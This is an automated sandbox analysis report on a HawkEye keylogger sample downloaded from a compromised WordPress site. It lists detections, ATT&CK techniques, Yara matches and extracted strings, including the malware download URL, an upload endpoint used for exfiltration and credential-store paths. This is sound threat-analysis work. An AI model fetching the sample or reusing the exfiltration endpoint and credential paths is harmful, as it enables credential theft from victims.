Loading ...

Play interactive tourEdit tour

Analysis Report http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:208783
Start date:17.02.2020
Start time:13:25:13
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 46s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:urldownload.jbs
Sample URL:http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:13
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.phis.troj.spyw.evad.win@14/8@1/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 39% (good quality ratio 33.8%)
  • Quality average: 71.5%
  • Quality standard deviation: 35.2%
HCA Information:
  • Successful, ratio: 94%
  • Number of executed functions: 218
  • Number of non-executed functions: 298
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Excluded IPs from analysis (whitelisted): 40.90.23.153, 40.90.137.120, 40.90.23.247, 51.105.249.239
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, lgin.msa.trafficmanager.net, am3p.wns.notify.windows.com.akadns.net, login.live.com, emea1.notify.windows.com.akadns.net, wns.notify.windows.com.akadns.net, login.msa.msidentity.com
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
HawkEye
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Initial sample is implementing a service and should be registered / started as service



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation121Scheduled Task1Process Injection212Software Packing13Credential Dumping1System Time Discovery1Remote File Copy1Data from Local System1Data Encrypted11Remote File Copy1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExecution through API11Application Shimming1Scheduled Task1Disabling Security Tools1Credentials in Files1Account Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesExecution through Module Load1Accessibility FeaturesApplication Shimming1Deobfuscate/Decode Files or Information11Input Capture1Security Software Discovery34Windows Remote ManagementInput Capture1Automated ExfiltrationRemote Access Tools1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseGraphical User Interface1System FirmwareDLL Search Order HijackingObfuscated Files or Information3Credentials in Registry2File and Directory Discovery2Logon ScriptsClipboard Data1Data EncryptedStandard Non-Application Layer Protocol2SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line Interface1Shortcut ModificationFile System Permissions WeaknessMasquerading1Account ManipulationSystem Information Discovery19Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkScheduled Task1Modify Existing ServiceNew ServiceVirtualization/Sandbox Evasion13Brute ForceVirtualization/Sandbox Evasion13Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection212Two-Factor Authentication InterceptionProcess Discovery4Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionIndicator BlockingBash HistorySystem Owner/User Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptRemote System Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: https://a.pomf.cat/URL Reputation: Label: malware
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeAvira: detection malicious, Label: TR/Kryptik.kjuys
Source: C:\Users\user\AppData\Roaming\TPykFAdhwNOvb.exeAvira: detection malicious, Label: TR/Kryptik.kjuys
Found malware configurationShow sources
Source: vbc.exe.4780.8.memstrMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
Multi AV Scanner detection for domain / URLShow sources
Source: robotrade.com.vnVirustotal: Detection: 12%Perma Link
Source: http://pomf.cat/upload.phpVirustotal: Detection: 8%Perma Link
Source: http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exeVirustotal: Detection: 18%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\TPykFAdhwNOvb.exeVirustotal: Detection: 38%Perma Link
Source: C:\Users\user\AppData\Roaming\TPykFAdhwNOvb.exeReversingLabs TitaniumCloud: Detection: 41%
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeVirustotal: Detection: 38%Perma Link
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeReversingLabs TitaniumCloud: Detection: 41%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\TPykFAdhwNOvb.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpackAvira: Label: TR/Kryptik.kjuys
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpackAvira: Label: TR/Kryptik.kjuys
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpackAvira: Label: TR/Kryptik.kjuys
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpackAvira: Label: TR/Kryptik.kjuys

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040A1A7 FindFirstFileW,FindNextFileW,8_2_0040A1A7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,12_2_0040702D

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.5:49788 -> 103.74.123.3:80
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /wp-content/images/views/qaxCr0UKyI0yfkE.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: robotrade.com.vnConnection: Keep-Alive
Found strings which match to known social media urlsShow sources
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exe, 00000008.00000002.1978302785.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exe, 00000008.00000002.1978302785.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: vbc.exe, 00000008.00000003.1978002173.0000000000A09000.00000004.00000001.sdmpString found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/welcomeie11https://www.microsoft.com/en-us/welcomeie11/http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: vbc.exe, 00000008.00000003.1978002173.0000000000A09000.00000004.00000001.sdmpString found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/welcomeie11https://www.microsoft.com/en-us/welcomeie11/http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: robotrade.com.vn
Urls found in memory or binary dataShow sources
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: http://bot.whatismyipaddress.com/
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php
Source: qaxCr0UKyI0yfkE.exe, 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmp, qaxCr0UKyI0yfkE.exe, 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
Source: wget.exe, 00000002.00000002.1954242091.0000000000B00000.00000004.00000020.sdmp, cmdline.out.2.drString found in binary or memory: http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe
Source: wget.exe, 00000002.00000002.1954404415.0000000001360000.00000004.00000040.sdmpString found in binary or memory: http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exelit
Source: wget.exe, 00000002.00000002.1954404415.0000000001360000.00000004.00000040.sdmpString found in binary or memory: http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exer0UK
Source: qaxCr0UKyI0yfkE.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: wget.exe, 00000002.00000002.1954404415.0000000001360000.00000004.00000040.sdmp, qaxCr0UKyI0yfkE.exe, 00000004.00000002.1971366862.0000000000F6C000.00000004.00000020.sdmp, qaxCr0UKyI0yfkE.exe.2.drString found in binary or memory: http://tempuri.org/DataSet1.xsdMMonoGame.UI.Forms.Properties.Resources
Source: vbc.exe, 00000008.00000002.1978232779.0000000000192000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
Source: vbc.exe, vbc.exe, 0000000C.00000002.2185769196.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://a.pomf.cat/
Source: vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected HawkEye KeyloggerShow sources
Source: Yara matchFile source: 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.2383322507.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1973879650.0000000003FF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 1516, type: MEMORY
Source: Yara matchFile source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 4296, type: MEMORY
Source: Yara matchFile source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPE
Contains functionality for read data from the clipboardShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040FDCB OpenClipboard,GetLastError,DeleteFileW,8_2_0040FDCB
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: qaxCr0UKyI0yfkE.exe, 00000004.00000002.1971316846.0000000000F38000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 0000000C.00000002.2185769196.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000007.00000002.2383322507.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000004.00000002.1973879650.0000000003FF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 1516, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 4296, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
Source: 12.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 7.2.qaxCr0UKyI0yfkE.exe.16f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 7.2.qaxCr0UKyI0yfkE.exe.16f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_0551AC9F NtUnmapViewOfSection,NtUnmapViewOfSection,7_2_0551AC9F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,8_2_0040A5A9
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_02BF7E204_2_02BF7E20
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_02BF5E884_2_02BF5E88
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_02BF00A04_2_02BF00A0
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_02BF00904_2_02BF0090
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05518B407_2_05518B40
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055139687_2_05513968
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055179C87_2_055179C8
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05514FF07_2_05514FF0
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_0551A1F07_2_0551A1F0
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05517E507_2_05517E50
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05511C587_2_05511C58
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055174B07_2_055174B0
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05510CA07_2_05510CA0
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05513B587_2_05513B58
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05511B727_2_05511B72
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055125787_2_05512578
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055149637_2_05514963
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055125697_2_05512569
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05513B687_2_05513B68
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05517F327_2_05517F32
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05513FD87_2_05513FD8
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055143C07_2_055143C0
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05512FC07_2_05512FC0
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05512FC87_2_05512FC8
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055153C87_2_055153C8
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05513FC87_2_05513FC8
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05514FE07_2_05514FE0
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_0551A1E07_2_0551A1E0
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055199EB7_2_055199EB
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055169907_2_05516990
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055169807_2_05516980
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05514BB17_2_05514BB1
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055153B87_2_055153B8
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055179B87_2_055179B8
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055143BC7_2_055143BC
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05517E407_2_05517E40
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055108287_2_05510828
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055138D07_2_055138D0
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055138F17_2_055138F1
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_05510C917_2_05510C91
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055160B07_2_055160B0
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055160A07_2_055160A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004360CE8_2_004360CE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040509C8_2_0040509C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004051998_2_00405199
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0043C2D08_2_0043C2D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004404068_2_00440406
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040451D8_2_0040451D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004045FF8_2_004045FF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040458E8_2_0040458E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004046908_2_00404690
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00414A518_2_00414A51
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00404C088_2_00404C08
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00406C8E8_2_00406C8E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00415DF38_2_00415DF3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00416E5C8_2_00416E5C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00410FE48_2_00410FE4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00404DE512_2_00404DE5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00404E5612_2_00404E56
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00404EC712_2_00404EC7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00404F5812_2_00404F58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_0040BF6B12_2_0040BF6B
Found potential string decryption / allocating functionsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00445190 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00416849 appears 66 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0040924D appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00412084 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004166E8 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00416A91 appears 88 times
Yara signature matchShow sources
Source: 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.2185769196.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2383322507.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.1973879650.0000000003FF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 1516, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 4296, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
